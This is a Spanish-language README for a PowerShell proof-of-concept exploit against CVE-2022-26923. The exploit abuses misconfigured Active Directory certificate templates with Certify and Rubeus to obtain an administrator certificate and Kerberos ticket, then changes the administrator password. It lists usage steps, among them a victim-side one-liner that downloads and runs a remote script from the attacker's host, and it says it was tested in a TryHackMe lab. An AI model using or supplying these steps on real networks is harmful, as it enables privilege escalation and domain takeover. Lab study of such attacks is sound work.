CVE-2022-26923-Powershell-POC
Un PoC de PowerShell para cargar y ejecutar automáticamente Certify y Rubeus desde memoria.
¿Cómo funciona?
- Carga Certify.exe y Rubeus.exe en memoria.
- Escanea la máquina objetivo en busca de plantillas de certificados mal configuradas. (más información en https://www.youtube.com/watch?v=HBRCI5O35R8)
- Solicita un certificado para el usuario Administrativo, basado en la plantilla vulnerable.
- Envía el certificado al manejador de certificados, que lo convierte al formato .pfx y lo devuelve al cliente.
- Utiliza Rubeus para cargar el certificado y generar un ticket para el usuario Administrativo.
- Cambia la contraseña del usuario Administrativo. (Solo para la demo)
El PoC se ha probado en los siguientes laboratorios de TryHackMe: https://tryhackme.com/room/adcertificatetemplates
Este CVE se utiliza para la escalada de privilegios, por lo que esta demo no cubre la explotación inicial, ni el laboratorio de THM.
Pasos:
- python3 -m http.server 80 [Máquina del atacante]
- python3 uploader.py 8000 [Máquina del atacante]
- IEX(New-Object Net.WebClient).DownloadString('http://IP/poc.ps1') [Máquina de la víctima]
Nota: Este PoC tiene fines educativos, eres responsable de tus propias acciones.